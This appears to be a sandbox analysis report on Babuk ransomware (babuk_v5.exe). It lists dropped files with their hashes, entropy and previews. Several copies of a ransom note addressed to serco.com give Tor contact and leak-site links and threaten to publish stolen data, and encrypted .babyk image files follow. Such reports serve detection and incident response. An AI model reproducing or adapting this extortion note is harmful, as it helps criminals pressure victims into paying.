                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Office\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-100.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):820
                                                                            Entropy (8bit):7.726129252997927
                                                                            Encrypted:false
                                                                            SSDEEP:24:PeR5bmJdyJcnTxDuWr/uJakLNCH46Z5PWLzHJ:Pe2Jd74auIkpCY6n+np
                                                                            MD5:A18E5D510D8CAC250399291D8E042140
                                                                            SHA1:C07DF2F7C05D93E037171C045F0AA352AFAA96B7
                                                                            SHA-256:D6F1B50EA0706F2EEF65C702814C44266D5B1FC59115FA45BBE9EA40F9EB6DE7
                                                                            SHA-512:FB30B5E1CB80F1FC916E61FD4A003E2B4E76C8B82817D5B5E3F45B9BB23F777333BFD94B5D0785CC37B038D9CB5175B7A625DBE1206E7ED3A31F73E24391E8CB
                                                                            Malicious:false
                                                                            Preview: [.w.....:`.|}..'. ...l.........}.qC...........iL..1......Y......!..3'..7....R.f....~....)"..x.gwEz....."DL..G^...4.E;...H.P.......6o.....q....51..S..[R...MF.h?..z_Q?tns%.~.......3.&.6.e...&....#O5N.,.[G..MU.}..^......%1..h\5.`r]5e#..E.f";..E...\u/...Q`&..sD..A.F.u&.A...u...VN.D.p.q.J...m--..O|=..4..$H.....s..m.H..3..3^........60.....%8.y.......:...O/...brJ..S..n.<..F..M,"W...]!..{.TU......d.Q.a.E.-.......\.nk...#.%R..Y......iCm.e...i...U..=g.Q.tM.F.x.s=.U.i.[:~z.c.<..[#e...7..P'7...9...=<41].V[.&.....@:........[...@.w8.{.f.+9....":..P(6y$.vn..[.........K...U...]..L..X...................$.Ua..V...l....(|...*..9g.............o..'....].v.Zg...Gx.Kbq.....w@...@...5.5J.D."}..kv.Ss.u....5E.7..z.9@...[...|..5X%#bV....l......16dq....m.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-125.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1016
                                                                            Entropy (8bit):7.793510509870985
                                                                            Encrypted:false
                                                                            SSDEEP:24:dWi+nPHNcaMK1ja/pbPYJgIWodoZTKqm2Dl7VI17o9zGvUQBus3:wRHNcaMppCdoZT77VSiGv13
                                                                            MD5:2E72E86BB9F523096B242856858EDD24
                                                                            SHA1:707CFA2BECF5142117551F1D837D2166A8663AA2
                                                                            SHA-256:2BD80D883DF0B5EA93465305A95985E3E5226375057A15BA8BDA932946DAE610
                                                                            SHA-512:031291A8BCAE95FE4D32C863A3F7D469A7B57673B49C34CF9E4E90ADD1BDC9BC55AD180868B86063B9A19F0776BC8FAE620656FEA9A3191E3BA5F0DBFFA97C8B
                                                                            Malicious:false
                                                                            Preview: SE..:....y.F.#.S..O4,..<....._.9.G*.u..#,..?..Y.X......P..-.....~...2.&W.....Nb]......(.......P...&Y....L.eI\].|]k..V....s.#z...C..c.......'.P..h.&k....p.YSV.]........|.?=.....2....F:..../..>V...Y..*b..Y.k..m)..-.... .v.8.}.ld......r3. ...t...C<....DM..XX..*.q...._.{.;tn..8C,.S.....;..u.1...*..YP}.a.6.......|.......>.A..\..`........a..@..k..J..w.ThsL.N..r.#-S.+..F..R..C..8...^.XPH..)#...|....0n.;.h9.w.2-y..H........Bf..\....).W$....xG...LQ556.|...Aj....<..w..r~K..4..C%.X./..#..B]....m;.#...qm2...a_,].k...F.X....,l.2......e.M..N...@A/../.-.TbE.......`.O.&%..>...j;.|.^....@......]...W..............zW.N.7....j.t._.....L.&Os....r6....;[.e.W/A.3Z..8......,EV..h..w....t.Q..2W.V......T_...t6!..!*...T.t.]?.l.8[.|.-..jY.-m..NXapi..q().S.s`."..xV.. E.t.r;...k........t.g...../18.B=j......l..J,..H..i).............vI...i..YDCaN..M....W...}...._B.LX...e.M...6.?.~....!.+...%T.$j..........;.JO.h.c/X...w....!..{o...(........e.E{).['....choung dong look
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-150.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1158
                                                                            Entropy (8bit):7.820139597572714
                                                                            Encrypted:false
                                                                            SSDEEP:24:kc7qH5/hYZgwDgFNtBdgJ3tge/QdQFLeKOynLk3WLzj9OYiURGXZ:R2hYu8gMF/sVQk3WLlniJZ
                                                                            MD5:536849C63602C443D866E5446CF0D3BF
                                                                            SHA1:6AD2082FEFB01648C47D39C2C3D0891B45AB7707
                                                                            SHA-256:CD63846FA4565E83EC9D8EA50B84B455DF07919ED2903975E2C2A88B76188C6C
                                                                            SHA-512:DBC4DB77FD416FD54FB969592A65C31B7461D2F6CF6179A178F9DA9AA50F289D2C6D8A8C33E74ED27FC8444E186A87150DCD5C7E6E5B37884AA3E5DF22532E57
                                                                            Malicious:false
                                                                            Preview: ....c...O.....S.R.,..mT....2.T.?.. Q..Q.jJ..+.C...7U.>........)_.k.....H.I.;ha.".7i1..#.......4...!._....M9.G..Dmx..Z.!..j".R...X.....e...R|.K...g.._..9....G."f.....O....j...Y3...t.X'..\.CX.....](].........f...z......C.B...^..9...2.I.!<.U.m.ZP..+H.....m.y..}I..Y.P.....0mF...W..9.4v-.0.|.AB.i.SM..D;.`...~{*.[b.H. .....W..Un.1?.=..s&#s...<\...#...6'gN..0Y.E...M+...2..|.G9./...........t)R.......4..Y_....V..L..........^.E(..9.f.zP....n..$..;...m..a.....r.H..Tu...J\.F%...g...s:....G...Y..`I.@.P...O....w`.pG.|Xi....97.>?.6..u....(J....}.W..n...3+.o....Z..v...6..'h..6.SZ.......e..3J...yD.1J..E....,`.K..u....%s.n.)..9a..1.._W....l.....~....X..N..E#...%,..T.j.t.f.......0k......n.v..........3...b...%...w.~jG.3...].}9......n...^.%C"...7. (.#.)}......O0_u.L....h..>uf._.:..rY.`.....!...t....QS..}..H..I......UE..L+e=.iis.i.....0Z:..J..&..$..1..G..X....[...t...."4.....#.!.....0:|_.Y..2...Z.#..\..5..i.u).j%......f....m..x..0~.V.:......+.%
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-200.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1560
                                                                            Entropy (8bit):7.890237383290061
                                                                            Encrypted:false
                                                                            SSDEEP:48:dyWo4TwqCqnTSiZVo8i9oK9h341W4qRTu:dyeXCeSifLeFh341W4qdu
                                                                            MD5:EAD7519FBF274B65949D1C3813B9B37D
                                                                            SHA1:ADB742DBD66CFFC9CD84338F4C8550E709D1A2D9
                                                                            SHA-256:7016875B5D53E9FC8122EAD6C39FE0EAE74FA369861B1C0B5B5B294CCE987CF3
                                                                            SHA-512:7E8E63A90F6CA503CB2752EEF0DA1FAFA0CE8FB360C50E8E933FC6A2E0C184617C0C0532D54E15F704D7EA9B3D3E67309DE46516393C7D77D69597F1B34A9AA5
                                                                            Malicious:false
                                                                            Preview: ....L.r)..........c.........V..#..5z~(..^r.!...@%.b,...BO!.....0.UN.n..:A.J..d!<q%.L...u.v..R.$.........=G....V"..t(...R...G.......U... ....b..8...X..s>.."|w..w.T........<.HSN...F.GS.T..w./_.z.~...qRFg.9.....#@o.2.*..-W.n<...../....k...\.5.dk...._..l..V0hA..r.[...W.....iS.....dd.y.W.....o.j......K..?).E.........>.....c ....?!.y..bq..g...H...C..;....:O,7.4.&`L.B...4.}.K.....E....wcb&]...[...:.qL...E.`.?.......d.z......b\m.T]..q...........RD&.g....zzX!KtZ..$xlL1D}.$.w....@.k.GP...$i..V.s.O.o.fw...'[.].\.y]@Z..V...Xc.S.^..G.r...hQ9U.G.6....c......d:.._.....1s<...m;..pG.%.C1..+..-....WP.ue..........._l..x.Vc.j.../..o._...i.w5..._......pB..?l.....wT.n[.5.z........K.n.0.=\..d.r.^.HR.......nh.u0..........C|.%.....5.........^...Q:.q..!O&./.]......@.I6o..o5]..../7..IL2.k.#R...". 4m.}.S.!.n.i.....^....0.....w`.....$...4Ib.vx#$V.MJ.v.n..y.O\v),(...y...#J.9.+.....[LuhN]F.P.u=..y.,:~.f<a}.wN.<n-.:.g.q@h../.^p.4..c:...h.,L.....v..C(.c.U.m;*.,W|-/V
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-400.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):3394
                                                                            Entropy (8bit):7.940556459040627
                                                                            Encrypted:false
                                                                            SSDEEP:96:nPkZWpEa1OQq90KE2Q6wgSyUNwa4zxRqbu3wXCDDxix:n+qgE2Q6tLCAXpDxY
                                                                            MD5:E4D520CD8CC45B24E33D8F48C15FD092
                                                                            SHA1:B26568038FE0CE469291C05A928DF540D29748E4
                                                                            SHA-256:FAF6D9AEBE6B634F6890F70B06E93ADC3C367B5E57F3E156908A1CC7BD8BF6C6
                                                                            SHA-512:BEDF6BB9E4F59EEE568A9AD191E6B971796CBF3183F4230A1A9B3F037D992450D15EB97312F7FD8384E3713F278E2501CF405489C031C40CAF2712B5F1282480
                                                                            Malicious:false
                                                                            Preview: ...,..5).I..2G.`...[...._`..z..@{v..Z.qnu. R..wK..#y.`.1.C....O.f.4.$......9......i.:S.p_.#...!.9AMs.}...)(......^q.>[.g.{...[.i{.#....pk..q'K...W.H6.q>...w.&....(..... .!D2.S6..T...t.wHA.....`..e?Z..^h..:._.{..6...[..Xd`E.kX....N..............##....\.J#BU.6....U..z8G..Jp.q.fxF..M........*ji...L....M..jk..Ta.cO.S.._.t./tQ['m.\j..(LX,.OK..#..s..T%....k.E.B...X._Is...f.U...L.a ......x.0.A....T*.FY....m...6..[ 9Nn.%..d*o#..f.0@.?=.<.`[...yCQH......[cqaq...r...7R0!Lz")..d.p.......H........<...dA...z..'.yd.,.s.....(...mD.).v)._..S.?|.0P...a.B.G..8....JS......b*...1,.>..d[..bC?d....t.e....."..N7.&..q..[.....^...f..a.(...>t~..E.>..o,8.z..\.?..X.......{^. ..h..d.....j..~`..I.......=... ....;..Q.;...a....n.`,Z..ZIe.f1@..Kk..*d.\.O..OB.....t...K...g.........Z...M....\...../.O.?.z!.`v..........M....".YJ..Tn..[..t.k..n].z..y.\...L...aQ...r..l.(......}d.`.%....>?.+...A.x..,.%QTp.7.3...c.d..m.P.x...(.%.A.k..f*..J..pF./a.L..1>...........Y.=Q..
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-100.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):830
                                                                            Entropy (8bit):7.7392387165568115
                                                                            Encrypted:false
                                                                            SSDEEP:24:A4x33FUGpk0akMJEVBprNcWoZ6SX0D4NEZ0p2VH:Nxc0akMJ+jcWowSK4K08t
                                                                            MD5:F3B2B81F5E7D31D6C389576688B07921
                                                                            SHA1:66F58ADA4D37D8374D2282574D1D32FFFF5FEEEF
                                                                            SHA-256:0A4F4E898516217AA419D86A0B04D7EE47CDE28FB3E0BD72094D2E1B57698CA3
                                                                            SHA-512:B0845B835E6537D91EECEF47E6FCDDA40E8F787FD52B5A445E2907647FA8E32E01D58699A5419F92712E73CD7E2E7A0491F1CE1A30C32EF7F0BB62E03FE1EF01
                                                                            Malicious:false
                                                                            Preview: 0...../..n....]..M..v..L..>..sL.i..J.u../"Q>.5...S(.....V..x..+....R....=......d...c...9.(.....;.m....T!.....g*.*.'.")R. g.Np.oc.@.......U...\.o.S.J.L.....}r...6l......u.............*..(/|,Sfu.X.A...bet.(L.._..[F#I.iIFM~..bv....AT.L..>qy .....d.YI.!ZWe..4..p.U.k..`..J:y..a.c.Ik....8^...f..U......y...o.f.....Y.......}.-w.';..Q...sv2....R>h...~H..:...Ul.........w...Z.<.X........Q...\:..h.[.....].r.._..d.Cy.......2....K..c..Y'...m.%.P.@.f[."-{......%...5...~.vF......|7....B<mvZ....-.QO(...XGiPo..;.K...)......v...m.:N.E......7E..!O...N...b..E..0....?F..-D.@P.s_..l.-..1.OY...y..j..V^Ry..sL.u....<D?......=.H.H].opV......uS...}.........k....J....p.N.$......^?...f.:..../vh. .a=C.<...@..o...`....k(...|!..<F,f.....o..w....M..B.h..A....[.SX..zOF.B.lP0.5.e[......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-125.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1039
                                                                            Entropy (8bit):7.829439669749516
                                                                            Encrypted:false
                                                                            SSDEEP:24:grit3SApXv2VCyx7jyq0MAhAiAXlrnWGHNFEM0aLmuD8:grioAVSrXyq0ThAiAVrWkFEM0amuI
                                                                            MD5:C2F4E2198F9C995A4138F3754CFCCF79
                                                                            SHA1:DF5C454B22269C8F3E85FB0E6C34ED20BFFA68A8
                                                                            SHA-256:EF7E47BCCCF9B00BD7CF4F2C5D8D629330369AD76608C5F1864884C8E218E92A
                                                                            SHA-512:EC234D8344C50BB43288AE6C648D9F96FF2176E67EB7C3A8246B9943A7D11BD5E15BD4D416982534208F9D299FCB0C5018A8A4FA565E9202BDB7D4DBE5036EDD
                                                                            Malicious:false
                                                                            Preview: .'...P..x..u[m.._..r.).F=...v.W4?..y.......|..+-....M.6.o 6\....P....t.'..$..3.OTW..j#..k.p....c...x..(..X...~~(B.v.71...fj'...g....%(.O5..V....,."nk...8.Wb.#....e.....d..ki.I....g.4.nO....iL.pv.....M..E....)......^,.....ys.W%...0...\......W..EM9..].k.D{~...Mt.T.;.DlS..A.^4..N%i..J..... }%2...*FV...R...D...+Gp....Or..&.......s..e.2.6..ub....D...zn`.Ki.2_..g2.q-.A.DJ..|.KJh.T.D.H...]............A.`...H3..y.?./-'0..h_8...."l....R.K..k^Xy5$Jn..1..t.1..Kz..eX(...r.a.B..6.n..I#.el..|O..7@...g..~..:...O.>....%k..k...........=..F..........p..G......Rm..2..B.=e..I...xzB.f.%.`...X.....z......=...)MP..........4....[.S.y.j..........."XA.....C6J_....I...W1.~....`.....c..._..x.&uE.ZK>z.j...fw.M......@../T.^.Y...*}.M.;......_>Q....v.-.w...T.R&iV;.ZR.....gs...A....S...."..?+..8.82s#.V.KKU.`2...X...g..a...x..#.v......26..D.....s..8.H....mE....k.9.,j5I.kF..,.Zo...0.....\.../ZX..%.Cq.j..m:.I.......L`..t..j<<...f.+.-..Y.U.t<\.tL..%..'}BeL.....'....U.
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-150.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):968
                                                                            Entropy (8bit):7.788191058888734
                                                                            Encrypted:false
                                                                            SSDEEP:24:bt69TYtKmIVYfaz/GEkxkqjWy3YxevSLCjOq:p6900mIo8SzK9YvSCR
                                                                            MD5:8CEEC87C74B738A54E279B45B6D8A77E
                                                                            SHA1:8857C6FC31123180853405AB41FDEC67F25F0DB8
                                                                            SHA-256:D6416EBDC21FB90AFC3DA85997E4CE8B34D8FC47D912A188C5B3B9926A9F85B1
                                                                            SHA-512:172C485B23A54088E7FD4673DB201F77F17660D2B9E881B2A037848F6E27E982A21E488D61508D9731CC9DC2F4EB0C3203EA7BD8D6A6BB29E9B5122EAFF2C75D
                                                                            Malicious:false
                                                                            Preview: .I>..o0...p/.n.i....u..&J..>C..`r....q....*.1..nz........8..V<;'..g@.....q@T.'C.D....:ES...>.P.a.....l.....UU\s.-U.q.g@..\...$.5..|.g#.9.3..`..+...y/...A..L.....6..Wz../..*.....l.>..%......y.TG.TL..NUJs.o....0....jO...u.[.tb.....9..g.;n...9..fm.Z..S....z8..........<....m....B..IP.2.FA....E....X.)re.Pv.(........oF.....e..y %0m..Q..a5..89!.w..u...Xja..M........I.Z.t..Ul..5.CPe.~>,....V...W......M..2(..%......# ?4.#.u.2.}.....M.m....`.TFp....1..~...M......_U..H....k.sXB.......G......./V....n{.B..7...z.e.. S.Tc.P.1.#.W....A.|b.*....>>.KT.T".....4....=_._..O.~......4..O..f...4..%.Y..}..^..K..H..{...I.H.+\..ig......p...A......-..;..9B2.4g.b/..4.....Ye........f.E........'..6.IWsW....N..........E.%....#<.]:.$L....P..em..M..}xdr.L.(:....s..5sAG.a..?..i...|v.)DQ......#&..z.....Y...B.:.........~hm.f.Wq...c.Y,........by..a3..H...X...97...l..h.9....f.".d/......n._..5..s..).u..._uS.lQ..g..O..O.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-200.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1661
                                                                            Entropy (8bit):7.890107059381409
                                                                            Encrypted:false
                                                                            SSDEEP:48:giDf7w/ELxTqsYgfDocGO5/8fYEihDdnZZtJZ5:FEgxlfzqgEwDdZZf
                                                                            MD5:47C8CE747409639F72D8D3E8E35F8916
                                                                            SHA1:2A387E6002269C56F48ED313A1C8248767C15E92
                                                                            SHA-256:E1C1746B82D0812D8A9EC2F6D22CD95B7617A27F53E81DF46B11E59CD50AD479
                                                                            SHA-512:58B20D8D6E4E9770224EE557FA6E307D995AC4AF8E67A35AB714EA4F1B5B0BD6BA5AF7FE9A0FC7F1B8F9654A7DE2B4A2A3841F761C6ABD7760BB085EAC8FA430
                                                                            Malicious:false
                                                                            Preview: w.N..t.E.U..R.qB/o.}yA2Jk...O.k..]...Q..!.p..@.....W.w.V.................U.i#.>.......2......|=5.}....i.OA.aq..0...|..y.W\ItX...Z3.`.U............<.zu.g.Nb....`F.Ne.F.I.......^!....."......s......>/...D....7.\1..C..+..m.t.y.2..^..;,k?...L......"....5.0.r.DV..eq..>r\#..;#..;)..6NW-8u |...v]5..i.?.0(.W)..mt..4..:.*pQ.w.y..A...1.......;x';....2C%... ..8A.,.5`M0.......5.....*G...!.....B.O-}.I[.0.C..vCwx J....5k.w..95>h&.L.G.^O./.j....CE....w.q~..:..y&U....+..>....E...Ir.)....a.L..'P...5./.%^..=.t..#..[.F...A.p'.......2...0s....b.9aj}x.S...#..'ZJ0..^.!..@Wer.W}....NX..........'.,ZG.FSh.x.W|.&........r...3..P......z..>.....2.....R..0.N...L^Vf.9..n.x.\6-B.u..J..^|...T.Y..7.Yv......c..?`...N........Vy.....A.Qi.;.....w....SXo..-g..D~.t...;.C...2CX...).x).....6.c.A.o....sh."x..sJj.V..o.\....c..$Y[{^.."..#.F.......kI.b;fk...U........h(%...M;af4.nf7dvw.c..H.z.........iW~.66.4!mb.-]4f...k. +.r....."\..#.dD.>.f...2.)..{d!. ...u.l.!.e..bz[$........
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-400.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):3706
                                                                            Entropy (8bit):7.953214306334212
                                                                            Encrypted:false
                                                                            SSDEEP:96:C8BfQvZ6lDy+KM7yGCzGa9i4XbHrBoXjlHCDoxu:CmfhLX6zGl4LH1o8Dok
                                                                            MD5:8B6B40B041D1D79843193B8E185C1864
                                                                            SHA1:5C0A268C47A3AE5576CA5BC5B91CD95B509C812D
                                                                            SHA-256:83DF3CC802401FEF67A7440B9BA99FA163BFFD9A4EB14769E3ADFED7B188A384
                                                                            SHA-512:44FD1F4CB8A1FB766D3C3515D39867B4766608CCF8DB0B9BC1807E10FFCAC26DC383132AC6B6A036068DAA02CC753E3602EFB33400AE7A496AE5451F8F7A2028
                                                                            Malicious:false
